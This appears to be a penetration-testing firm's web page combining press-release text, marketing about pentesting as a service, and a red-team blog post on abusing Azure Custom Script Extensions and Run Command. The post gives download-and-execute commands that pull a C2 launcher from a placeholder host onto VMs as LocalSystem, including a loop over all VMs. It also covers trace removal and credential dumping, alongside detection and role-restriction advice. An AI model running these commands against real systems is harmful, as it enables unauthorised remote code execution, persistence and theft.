*Gartner “Market Guide for Vulnerability Assessment,” Craig Lawson, et al, 20 November 2019

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100


Attacking Azure with Custom Script Extensions

PowerShell and Bash scripts are excellent tools for automating simple or repetitive tasks. Azure values this and provides several mechanisms for remotely running scripts and commands in virtual machines (VMs). While there are many practical, safe uses of these Azure features, they can also be used maliciously. In this post we’ll explore how the Custom Script Extension and Run Command functionality could be leveraged by an attacker to establish a foothold in an environment, which could be used to persist access and escalate privileges.

Background

Before we dive into how an attacker would make use of the Custom Script Extension and Run Command features, let’s first understand what they are and their intended uses.

Custom Script Extension

Azure provides a large selection of virtual machine (VM) extensions which perform post-deployment automation tasks on Azure VMs. Typical tasks performed by VM extensions include anti-virus deployment, VM configuration, and application deployment/monitoring. The Custom Script Extension is particularly interesting as it downloads a script from a user-specified location (e.g. URL, blob storage, etc.) and then executes the script on a running Azure Windows or Linux VM. The typical usage of Custom Script Extensions is for one-time setup tasks, like installing an IIS Server, but since it runs an arbitrary script, it could perform just about anything.

Run Command

The Run Command feature connects to the Virtual Machine Agent to run commands and scripts. The scripts can be provided through the Azure Portal, REST API, Azure CLI, or PowerShell. An advantage of the Run Command feature is that commands can be executed even when the VM is otherwise unreachable (e.g. if the RDP or SSH ports are closed). This makes the Run Command feature particularly useful for diagnosing VM and network issues.

Key Similarities

While there are differences between the two features, there are some key similarities that make them particularly useful to attackers and penetration testers:

  1. Both features are available to a user with the Virtual Machine Contributor role.
  2. Both features run user-supplied commands in any VM that the user can access.
  3. Both features run the commands as the LocalSystem account on the VM.

Scenario:

Now that we understand some of the features available to us, let's explore how an attacker could utilize these features for their own purposes. We'll play the role of a penetration tester who has compromised (or been provided with) an account which has the VM Contributor role in Azure. This role would allow us to "manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to" (link). Our goal is to maintain access to the environment and escalate our privileges.

Attack Overview

At a high-level, here are the steps our proof-of-concept attack will take:

  1. We’ll set up a Covenant command and control (C2) server outside of the target Azure environment. This server will host a PowerShell script (the “Launcher“) which when executed in a VM will run the Covenant implant (the “Grunt”).
  2. Through the Azure Portal, we’ll identify our target virtual machine(s) and add a Custom Script Extension. This Custom Script Extension will download our Powershell Launcher and start the Grunt. This will connect back to the C2 server, and allow us to run commands as LocalSystem on the VM.
  3. Once we’ve established access, we’ll exit out and cover our tracks by removing the extension.
  4. For demonstration purposes, we'll also repeat this process using the Run Command feature by sending a PowerShell command which will execute our Launcher and run another Grunt.

While this proof-of-concept attack is focused on Windows VMs and tooling, the same concepts and features are equally applicable to Azure Linux VMs.

1: Covenant Command and Control Server Setup

Let’s start by setting up Covenant. Covenant is an advanced .NET command and control framework. We’ll be installing Covenant on a server we control, outside of the Azure environment that we’re attacking. In this proof of concept, we’ll be using c2.netspi.invalid as our C2 server. This is not a real DNS name, but it illustrates the concept.

I’ll skip past installation and startup because solid guides are available on the Covenant Wiki. Once Covenant is installed and running, the UI is available on port 7443 by default. We’ll navigate to the webpage, register an initial admin user and login.

Once logged in, create an HTTP Listener. The listener will monitor a specified port awaiting traffic from the Grunt that we’ll run on our VM. The listener lets us send commands to, and receive results from, the Grunt implant.

[Screenshot: Covenant HTTP listener configuration]

Note that "BindAddress" is 0.0.0.0, which allows Covenant to bind port 80 on all available IPv4 addresses on the local machine (where Covenant is running). The "ConnectAddress" is a DNS name for our C2 server. This value is used to generate the URL which the Grunt will communicate with.

Once a listener is created, we need to create and host our Launcher. The Launcher is a PowerShell script which we’ll run in the target VM to start the Grunt. For this demo, we’ll use Covenant’s out-of-the-box PowerShell launcher. It’s important to note that this exact script is likely to be caught by anti-virus once the VM attempts to run it, but I’ve simply disabled anti-virus for the proof-of-concept. Typically, the Launcher script would need to be altered and obfuscated to avoid detection.

Once we’ve selected the PowerShell option from the Launcher Menu, we’ll first generate our script. The default options are fine for our test.

[Screenshot: Covenant launcher generation options]

After clicking the Generate button, we’ll navigate to the Host tab and provide a path where the script will be hosted and available from our C2 server. After we click the Host button, our script is now available for download from our server, and the UI provides a convenient PowerShell script to download and execute the Launcher.

[Screenshot: Covenant launcher hosting]

Our Covenant C2 server is now ready. The PowerShell Launcher script is available for download at https://c2.netspi.invalid/netspi/launcher.ps1. The Launcher will run the Grunt, which will connect back to the Covenant server to receive commands and send results.

We could actually host the PowerShell Launcher script anywhere. For example, we could host the script in GitHub or in Azure blob storage. If someone were to review the executed commands later, a script downloaded from these locations would be less suspicious. For this proof-of-concept, I prefer to use Covenant’s ability to easily host the launcher itself.

2: Use a Custom Script Extension to Launch the Implant

Thus far, all the work has been preparation. We’ve learned about the features available to us. We’ve set up our tools. Here comes the attack.

We’ll use the Azure Cloud Shell, but the same steps could be performed through Azure’s Portal web interface as well. We’ll start by listing the VMs available to us using the Get-AzVM cmdlet.

PS Azure:\> Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
ResourceGroupName   Name      Location
-----------------   ----      --------
TESTER              CSETest   westcentralus

We're able to identify a VM named "CSETest" running in the environment. We can now use the Set-AzVMCustomScriptExtension cmdlet to add a Custom Script Extension to that VM. Before issuing the shell command, let's review the parameters we'll pass to the cmdlet:

  1. -ResourceGroupName TESTER
    1. The ResourceGroupName as identified in the previous command results.
  2. -VMName CSETest
    1. The VM Name as identified in the previous command results.
  3. -Location westcentralus
    1. The location of the VM as identified in the previous command results.
  4. -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1'
    1. The URL where our PowerShell Launcher is hosted by our Covenant server.
  5. -Run 'launcher.ps1'
    1. The command used to execute the Launcher. In general, this is where script parameters could be passed.
  6. -Name CovenantScriptExtension
    1. An arbitrary name for our Custom Script Extension.

The moment we’ve all been waiting for, let’s run our Custom Script Extension:

PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension

Wait… it looks like nothing is happening in the Cloud Shell. This is because the PowerShell launcher is still running and has not yet terminated. If we return to our Covenant UI, we'll receive a notification that a new Grunt has connected successfully. We'll also see some basic information about the system on which it is running. In the screenshot below, note that the Hostname and OperatingSystem are correct for our targeted VM.

[Screenshot: Covenant Grunts panel showing the new Grunt]

With only a couple of commands, our implant is successfully running on the targeted VM. If we click on the Grunt's name, we can interact with it and issue further commands. In the screenshot below, we confirm that the Grunt is running as the LocalSystem account.

[Screenshot: Covenant Grunt running as LocalSystem]

That’s it. We have a SYSTEM process running on the target VM under our control. We have many options from here including establishing persistence and escalating our privileges further. For example we could:

  • Dump hashes/credentials with Invoke-Mimikatz.
  • Install a service to ensure a Grunt is started if the VM is restarted.
  • Search for sensitive files saved on the VM.
  • Enumerate domain information to target other VMs.

For now, we’ll stop this Grunt by issuing it the “Kill” command from the Covenant UI.

If we return to our Cloud Shell, we’ll see that we finally have some output:

PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK

After we killed the Grunt, the Custom Script Extension completed successfully. This indicates that the Custom Script Extension’s execution is tied to the Grunt. Due to Custom Script Extension’s 90 minute time limit, an attacker would need to accomplish their tasks within that timeframe. Alternatively, one could also establish persistence and open another Grunt, then allow the Custom Script Extension to finish successfully by killing the original Grunt.

3: Custom Script Extension Cleanup

Before moving on, let’s take a moment to cover our tracks and remove the Custom Script Extension. This can be accomplished with the Remove-AzVMCustomScriptExtension cmdlet. Its parameters are very similar to ones used for Set-AzVMCustomScriptExtension. When we run it in the Cloud Shell, we’ll see the following:

PS Azure:\> Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Name CovenantScriptExtension

Virtual machine extension removal operation
This cmdlet will remove the specified virtual machine extension. Do you want to continue?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK

Helpfully, this also removes the files which were written to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension. These files are discussed in further detail at the end of this post.

4: Use the Run Command Feature to Launch Another Implant

In some cases, we may be unable to execute the Custom Script Extension. Perhaps our account doesn’t have appropriate privileges to do so. Maybe a Custom Script Extension has already been deployed so we can’t add another. Our alternative is to use the Run Command feature to run the same PowerShell Launcher and connect another Grunt. We’ll even get to keep the LocalSystem privileges.

Since we have already identified the target VM, and Covenant has already provided a one-line command to download and run the Launcher, we'll only need to pass that command through Cloud Shell to the VM via the Run Command feature. We'll use az vm run-command for this. Like we did before, let's make sure we understand the command itself:

  1. az vm run-command invoke
    1. This set of keywords create a single logical command to “Execute a specific run command on a VM.”
  2. --command-id RunPowerShellScript
    1. The command we intend to execute. We could choose from pre-built commands, but we would like to execute an arbitrary PowerShell script.
  3. --name CSETest
    1. The name of the VM.
  4. -g TESTER
    1. The name of the Resource Group.
  5. --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
    1. Typically, the "scripts" parameter is used to specify the name of a PowerShell script to execute. We are using it to specify the one-line command which downloads and runs the Launcher. As mentioned before, this one-line command is provided by Covenant in its UI.

Now that we know what we’re doing, let’s run our command:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
- Running ..

At least this time we get some immediate feedback from Cloud Shell that something is happening. And after about 30 seconds, a new Grunt appears in our Covenant UI:

[Screenshot: new Covenant Grunt from the Run Command execution]

Again, we can interact with the Grunt and confirm that the Grunt is running as the LocalSystem account.

[Screenshot: Covenant Grunt running as LocalSystem]

As with the Custom Script Extension, we now have about 90 minutes before the command times out. Since we’re running as LocalSystem, we should have ample opportunity to establish persistence (if needed) and escalate privileges.

If we send the "Kill" command to the new Grunt and return to our Cloud Shell, we'll see that the command output is updated, reporting a successful execution.

{
  "value": [
    {
      "code": "ComponentStatus/StdOut/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    },
    {
      "code": "ComponentStatus/StdErr/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    }
  ]
}

Unlike the Custom Script Extension (which must be uninstalled before being deployed again), we could re-issue the same command in Cloud Shell to launch a new Grunt. If we have multiple target VMs, we could use Invoke-AzureRmVMRunCommand to execute the Launcher across many targets at once.
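
As a rough sketch of that fan-out (my own example, not from the original post), and assuming the Az PowerShell module (Invoke-AzVMRunCommand is the Az equivalent of the AzureRM cmdlet mentioned above), the same one-liner can be pushed to every VM we can enumerate:

# Save the download one-liner to a local file, since Invoke-AzVMRunCommand takes a script path
$oneLiner = "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
$oneLiner | Out-File -FilePath ./launcher-stub.ps1

# Run it against every VM visible to our account
Get-AzVM | ForEach-Object {
    Invoke-AzVMRunCommand -ResourceGroupName $_.ResourceGroupName -VMName $_.Name `
        -CommandId 'RunPowerShellScript' -ScriptPath ./launcher-stub.ps1
}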

Monitoring this attack

For blue teamers, hopefully this post illustrates how granting a user the Owner, Contributor, Virtual Machine Contributor, or Log Analytics Contributor role allows that user to obtain SYSTEM rights on all accessible VMs. With that access, they can embed themselves into the network, maintaining persistence and continuing to escalate.

The silver lining here is that actions can be restricted by creating new roles and limiting permissions appropriately. The related actions that one may want to restrict are:

  • Microsoft.ClassicCompute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/runCommand/action
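
As a rough sketch of that mitigation (the role name and the Actions wildcard below are illustrative, not a drop-in replacement for any built-in role), a custom role without those actions can be defined as JSON and registered with New-AzRoleDefinition:

# Hypothetical custom role: VM management rights minus extension and Run Command actions
@'
{
  "Name": "Limited VM Operator (no script execution)",
  "IsCustom": true,
  "Description": "Manage virtual machines without the ability to push extensions or Run Commands",
  "Actions": [
    "Microsoft.Compute/virtualMachines/*"
  ],
  "NotActions": [
    "Microsoft.ClassicCompute/virtualMachines/extensions/write",
    "Microsoft.Compute/virtualMachines/extensions/write",
    "Microsoft.Compute/virtualMachines/runCommand/action"
  ],
  "AssignableScopes": [ "/subscriptions/SUB_ID_GOES_HERE" ]
}
'@ | Out-File .\limited-vm-operator.json

New-AzRoleDefinition -InputFile .\limited-vm-operator.json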

Additionally, the actions appear in the Activity Log for the targeted VM. If these actions aren’t regularly used in the organization, it’s straightforward to create Alerts for “Run Command on Virtual Machine” and “Create or Update Virtual Machine Extension.”

[Screenshot: VM Activity Log entries]

Lastly, there are file system changes on the target VM for each of the approaches. If trying to remain undetected, an attacker may remove these files, but not much can be done to prevent their creation.

Custom Script Extension Files

The script itself is downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\<version>\Downloads\<other version>\<script name> when the Custom Script Extension is installed. For example, the PowerShell launcher in our proof-of-concept was downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.3\Downloads\launcher.ps1.

If the Custom Extension is later uninstalled, the whole C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension folder is removed.

The output from the Custom Script Extension (including logging from the script itself) is written to the C:\WindowsAzure\Logs\Plugins\Microsoft.Compute.CustomScriptExtension\<version> folder. For example, our logs were written to the C:\WindowsAzure\Logs\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.3 folder. These are not automatically deleted when the Custom Script Extension is uninstalled.

Run Command Files

The Run Command approach has similar file system artifacts. The supplied script is written to C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<version>\Downloads\script<number>.ps1. Any logging output from the script is written to the C:\WindowsAzure\Logs\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<version> folder.

Acknowledgements

Thank you to Karl Fosaaen for the previous research and suggestion of how Custom Script Extensions could be utilized to launch implants. And thank you to cobbr at SpecterOps for publishing and maintaining Covenant, which was a pleasure to work with.

Back

WhatIs.com Word of the Day: Pentesting as a Service (PTaaS)

On Feb. 4, 2020, NetSPI Product Manager Jake Reynolds was featured in TechTarget’s WhatIs.com defining Pentesting as a Service.

Pentesting as a Service (PTaaS) is a cloud service that provides information technology (IT) professionals with the resources they need to conduct and act upon point-in-time and continuous penetration tests. The goal of PTaaS is to help organizations build successful vulnerability management programs that can find, prioritize and remediate security threats quickly and efficiently.

In IT security, it is common practice for businesses to hire reputable, white hat testers to come in and proactively look for attack vectors that could be exploited. Inviting an outside entity to try and breach a network, server or application may sound counter-intuitive, but it’s also one of the best ways to identify and remediate difficult-to-spot security issues.

Read the full article here.

Back

NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™

Minneapolis, Minnesota – NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled with cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery model powered by Resolve™.

Who:

Deke George, Founder and CEO at NetSPI
Aaron Shilts, President and COO at NetSPI
Charles Horton, SVP Client Services at NetSPI
Jake Reynolds, Product Manager at NetSPI

What:

RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™.

“Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion.

View the full conference agenda here.

When:

February 24-28, 2020

Where:

Booth #4201
Moscone Center
San Francisco, California

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee on behalf of NetSPI
Email: tori@maccabee.com
Phone: (612) 294-3100

Back

Keep Pace with Evolving Attack Surfaces: Penetration Testing as a Service

Study after study shows that business leaders across the country place cybersecurity in their top concerns for 2020. PwC’s 23rd annual CEO Survey shows that 53% of U.S. CEOs are “extremely concerned” about the effect cyber threats will have on growth prospects.

And the findings of the Conference Board are similar. According to the survey, cybersecurity was the top concern for CEOs in 2019. What’s more, according to the study, cybersecurity budgets are increasing, with more than 70% of responding CEOs globally planning to increase their cybersecurity budgets this year. Interestingly, cybersecurity strategy remains elusive: almost 40% of responding CEOs globally say their organizations lack a clear strategy to deal with the financial and reputational impact of a cyberattack or data breach.

Often, we see that an inadequate security test can leave a company with a false sense of security. Couple that with the fact that in 2019 the average cost of a data breach to a company was $3.9 million, and a greater business challenge emerges. The bottom line is that organizations are always-on, so their security should be too. It’s more critical than ever that organizations implement a more proactive strategy to better understand their security weaknesses and vulnerabilities.

Penetration testing, delivered in a consumable fashion, and executed monthly or quarterly, rather than annually, can help. At NetSPI we call it Penetration Testing as a Service or PTaaS. Here’s all you need to know before investing in PTaaS, to achieve a successful vulnerability testing and management program.

An Introduction to PTaaS

PTaaS is the delivery model of combined manual and automated pentesting producing real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

A successful PTaaS program delivers security testing comprised of an expert manual pentesting team enhanced by automation. It puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and have the ability to perform always-on continuous testing.

The Case for PTaaS

According to PwC, cyber threats are a drag on growth, and tolerances for breaches and trust in technology are plummeting. To combat these trends, organizations need to shore up resilience. “Step one is to use technology to get real-time views into your most critical processes and assets, and then set up for continuous resilience,” it states.

Organizations with a mature security program understand that point-in-time testing is not the best option for continuously securing their applications and networks. New code and configurations are released every day; a continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities more easily and efficiently.

PTaaS should be viewed as an essential IT department activity for identifying exploitable security vulnerabilities present across all networks and computing devices, such as desktop operating systems, web applications, mobile apps, and more. It proactively hardens an environment by identifying security weaknesses and software vulnerabilities, and then prioritizing them by severity of outcome should they be exploited, as factored against the likelihood of the attack. [Want to read more about penetration testing, a commonly misunderstood security discipline? Grab a cup of coffee and enjoy.]

Choosing the Best PTaaS Partner for Your Business

When evaluating PTaaS options, security professionals would be well advised to:

  • Insist on real-time accessible reporting and not settle for reams and reams of static PDF reports that don’t allow for access to data in real-time as vulnerabilities are found.
  • Look for a platform, dashboard, or other technology efficiencies that offer increased speed to remediation and direct communication with the pentesting experts. For example, NetSPI’s platform houses all vulnerability data and provides remediation guidance for real-time access and assessment.
  • Prioritize non-negotiables like employing a team of expert deep-dive manual pentesting professionals enhanced by automation, as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.

As attack surfaces constantly grow and evolve, it’s important to recognize that point-in-time penetration testing, while valuable, is no longer an effective means of year-round security, and that there are options available that can increase the value you get from traditional testing. As an industry, our ultimate goal is to prevent breaches from happening – but how can we make that happen without having an “always-on” mentality?

Learn more about NetSPI PTaaS here.
